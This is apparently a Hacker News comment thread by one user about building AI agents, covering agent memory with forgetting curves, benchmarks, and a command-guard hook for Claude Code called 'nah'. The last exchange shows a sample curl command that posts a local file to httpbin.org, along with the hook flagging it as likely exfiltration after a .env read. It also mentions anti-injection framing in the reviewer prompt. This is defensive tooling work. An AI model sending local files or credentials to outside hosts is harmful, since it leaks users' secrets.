Hacker News | tonipotato's comments

The problem with formal prompting languages is they assume the bottleneck is ambiguity in the prompt. In my experience building agents, the bottleneck is actually the model's context understanding: the same precise prompt gives wildly different results depending on what else is in the context window. Formalizing the prompt doesn't help if the model builds the wrong internal representation of your codebase. That said, curious to see where this goes.


Two pieces of advice I keep seeing over & over in these discussions: 1) start with a fresh/baseline context regularly, and 2) give agents unix-like tools and files they can drive with simple pseudo-English commands (e.g. via bash), where they can invoke "--help" to learn how to use them.

I'm not sure adding a more formal language interface makes sense, as these models are optimized for conversational fluency. It makes more sense to me to give them instructions for using more formal interfaces as needed.


Working on Engram, a cognitive memory system for AI agents. Instead of vector DB + semantic search, it uses models from cognitive science (ACT-R activation decay, Hebbian learning, forgetting curves) to decide what to remember and what to forget. Been running it in production for a month, 230K+ recalls. Just shipped v2 with multi-agent shared memory. https://github.com/tonitangpotato/engram-ai https://github.com/tonitangpotato/engram-ai-rust
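
For anyone unfamiliar with the ACT-R side of this: base-level activation is roughly the log of summed, decayed access recencies, so memories that are used often or recently stay "hot." A minimal sketch of that formula (this is not Engram's actual code; the function name and defaults are mine):

```python
import math
import time

def base_level_activation(access_times, now=None, d=0.5):
    """ACT-R base-level activation: B = ln(sum_j t_j^-d), where t_j is the
    age of the j-th access and d is the decay rate (0.5 is the classic
    default). Frequently/recently accessed memories score higher."""
    now = now if now is not None else time.time()
    return math.log(sum((now - t) ** -d for t in access_times))

# A memory touched three times recently beats one touched once a day ago.
now = 1_000_000.0
fresh = base_level_activation([now - 10, now - 60, now - 300], now=now)
stale = base_level_activation([now - 86_400], now=now)
assert fresh > stale
```

Recall then becomes "rank by activation, retrieve above a threshold," which is what gives you forgetting for free instead of an ever-growing vector index.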


I feel the same! They keep raising the bar higher and higher. I wrote a bot that passes SWE-bench Lite at 67%, but I can't get a chance to show it. I also tried to submit to SWE-bench full, but submissions are limited to organizations. Where can independent developers post our work? Could we have an open benchmark for everyone, ranked purely on merit?


Crypto receipts for agent state are cool, especially for compliance, where you need to prove what an agent knew at some point. But the thing I keep running into: most agent memory is just append-only. Store everything forever. And in practice, long-running agents just drown in their own noise. The harder problem imo isn't reliable storage, it's deciding what to keep active vs what to let fade.
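
Even a crude keep-vs-fade policy beats append-only. One toy sketch (names and constants are mine, not from any of these projects): score each entry with an exponential forgetting curve plus a frequency bonus, and sweep faded entries into a cold archive rather than deleting them, so the reliable-storage layer still keeps everything:

```python
import math

HALF_LIFE = 3600.0  # seconds; tune per workload

def retention(entry, now):
    """Exponential forgetting curve on recency, with a small bonus for
    entries that have been accessed repeatedly."""
    age = now - entry["last_access"]
    return math.exp(-age * math.log(2) / HALF_LIFE) * (1 + math.log1p(entry["hits"]))

def sweep(store, now, threshold=0.05):
    """Split the store: entries above threshold stay in active memory,
    the rest move to a cold archive (not deleted)."""
    active, archive = {}, {}
    for key, entry in store.items():
        (active if retention(entry, now) >= threshold else archive)[key] = entry
    return active, archive
```

The agent's working context only ever sees `active`, while the receipts/audit layer can still cover the archive.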


Cool project. The deterministic layer first → LLM only for edge cases design is the right call; it keeps things fast for the obvious stuff.

One thing I'm curious about: when the LLM does kick in to resolve an "ask", what context does it get? Just the command itself, or also what happened before it? Like curl right after the agent read .env feels very different from curl after reading docs — does nah pick up on that?


Thanks! In my own work the LLM only fires for 5% of the commands - big token savings.

When it does kick in, it gets: the command itself; the action type and why it was flagged (for example, 'lang_exec = ask'); the working directory and project context, so it knows whether it's inside the project; and a recent conversation transcript (12k chars by default, configurable).

The transcript context is pulled from Claude Code's JSONL conversation log. Tool calls get summarized compactly, like [Read: .env] or [Bash: curl ...], so the LLM can see the chain of actions without blowing up the prompt. I also include anti-injection framing in the prompt so that it doesn't try to execute instructions found in the transcript.
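
For anyone curious what that summarization step can look like, a rough sketch — the JSONL field names here are guesses for illustration, not Claude Code's actual schema:

```python
import json

def summarize_tool_calls(jsonl_lines, max_arg_len=40):
    """Collapse tool-call records into compact [Tool: arg] tags so the
    reviewing LLM sees the chain of actions without the full transcript."""
    tags = []
    for line in jsonl_lines:
        record = json.loads(line)
        if record.get("type") != "tool_use":  # field names are assumptions
            continue
        arg = str(record.get("input", ""))[:max_arg_len]  # truncate long args
        tags.append(f"[{record.get('name', '?')}: {arg}]")
    return " ".join(tags)

log = [
    '{"type": "tool_use", "name": "Read", "input": ".env"}',
    '{"type": "text", "content": "thinking..."}',
    '{"type": "tool_use", "name": "Bash", "input": "curl -s https://httpbin.org/post"}',
]
print(summarize_tool_calls(log))
# [Read: .env] [Bash: curl -s https://httpbin.org/post]
```

Truncating arguments is the important bit: it keeps the action chain visible while bounding how much attacker-controlled text from the transcript reaches the prompt.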

curl after the agent read .env does get flagged by nah:

```
curl -s https://httpbin.org/post -d @/tmp/notes.txt   # POST notes.txt contents to httpbin

Hook PreToolUse:Bash requires confirmation for this command:
nah? LLM suggested block: Bash (LLM): POSTing file contents to external host.
Combined with recent conversation context showing credential files being read,
this appears to be data exfiltration. Even though httpbin.org is a legitimate ech...
```

